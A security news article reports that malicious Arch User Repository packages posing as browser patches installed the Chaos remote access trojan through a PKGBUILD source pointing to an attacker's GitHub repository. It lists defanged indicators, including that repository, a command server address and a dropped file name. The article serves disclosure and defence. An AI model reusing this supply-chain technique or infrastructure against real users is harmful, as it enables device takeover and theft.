Developers of Arch Linux discovered three malicious packages in the Arch User Repository (AUR). These packages were used to install the Chaos remote access trojan (RAT) on Linux devices.
The packages were named librewolf-fix-bin, firefox-patch-bin, and zen-browser-patched-bin, and were uploaded by the user danikpapas on July 16, 2025. The packages were removed from the repository two days later, after the community flagged them as malicious.
“On July 16, a malicious package was uploaded to AUR,” warn the AUR maintainers. “Two more malicious packages were uploaded by the same user a few hours later. These packages executed a script from a repository on GitHub, which was identified as a remote access Trojan (RAT).”
As with many other package repositories, there is no formal procedure for reviewing new or updated packages in the AUR. This means that users should independently review the code and installation scripts before building and installing a package.
Although the packages have now been removed, Bleeping Computer examined their archived copies. The PKGBUILD file of all the packages contained a source entry with the name patches, which pointed to a GitHub repository controlled by the attacker: https://github.com/danikpapas/zenbrowser-patch[.]git.
During the processing of PKGBUILD, this repository is cloned and considered as part of the package update and build process. However, instead of a patch, the repository on GitHub contained malicious code that was executed during the build or installation phase. Currently, this repository has been removed from GitHub, and the .git is no longer available for analysis.
The publication also notes that the malware was attempted to be promoted on Reddit through responses to various topics related to Arch Linux (where malicious packages in AUR were promoted in the messages). Comments were posted from an account that had been inactive for many years and was likely compromised and used for “advertising” the malware.
Arch users on Reddit immediately found the comments suspicious, uploaded one of the components to VirusTotal, and discovered Chaos RAT in it.
Chaos RAT is an open-source remote access trojan for Windows and Linux. It can be used for uploading and downloading files, executing commands, and opening a reverse shell. As a result, attackers gain full access to the infected device.
This Trojan is often used in campaigns to distribute cryptocurrency miners, as well as for collecting credentials, stealing information, or espionage.
In this case, after installation, the malware repeatedly connected to the command server 130.162[.]225[.]47:8080, waiting for commands.
“We strongly recommend that users who may have installed any of these packages remove them from their system and take necessary measures to ensure they have not been compromised,” warns the Arch Linux team.
In particular, it is recommended to immediately check for the presence of a suspicious executable file named systemd-initd, which may be located in the /tmp directory. If the file is found, it should be deleted.
2025.03.12 — Mass exploitation of PHP-CGI vulnerability in attacks targeting Japanese companies
GreyNoise and Cisco Talos experts warn that hackers are actively exploiting CVE-2024-4577, a critical PHP-CGI vulnerability that was discovered and fixed in early June 2024. CVE-2024-457…
Full article →
2025.02.10 — Failed attempt to block phishing link results in massive Cloudflare outage
According to the incident report released by Cloudflare, an attempt to block a phishing URL on the R2 platform accidentally caused a massive outage; as a result, many Cloudflare…
Full article →
2025.02.06 — Let's Encrypt to stop sending expiration notification emails
The nonprofit organization announced that, starting June 4, 2025, it will stop sending expiration notification emails to subscribers. The primary reason behind this decision…
Full article →
2025.02.28 — Qualcomm extends support for Android devices to 8 years
Qualcomm Technologies announced its collaboration with Google with the purpose to provide extended support for OEM devices running on company's flagship chipsets. This partnership will…
Full article →
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE
Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…
Full article →
2025.02.18 — Chrome Enhanced Protection mode is now powered by AI
The Enhanced Protection mode in Google Chrome has been updated. Now it uses AI to protect users from dangerous sites, downloads, and extensions in real time.…
Full article →
2025.02.12 — 2.8 million IP addresses used to brute-force network devices
The Shadowserver Foundation warns of a massive web login brute-forcing attacks targeting nearly 2.8 million IP addresses per day. Unknown attackers are seeking…
Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management
Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…
Full article →
2025.02.09 — Abandoned AWS S3 buckets could be used in attacks targeting supply chains
watchTowr discovered plenty of abandoned Amazon S3 buckets that could be used by attackers to deliver malware and backdoors to government agencies and large corporations. The researchers discovered…
Full article →
2025.03.28 — Zero-day vulnerability in Windows results in NTLM hash leaks
Security experts reported a new zero-day vulnerability in Windows that enables remote attackers to steal NTLM credentials by tricking victims into viewing malicious files in Windows…
Full article →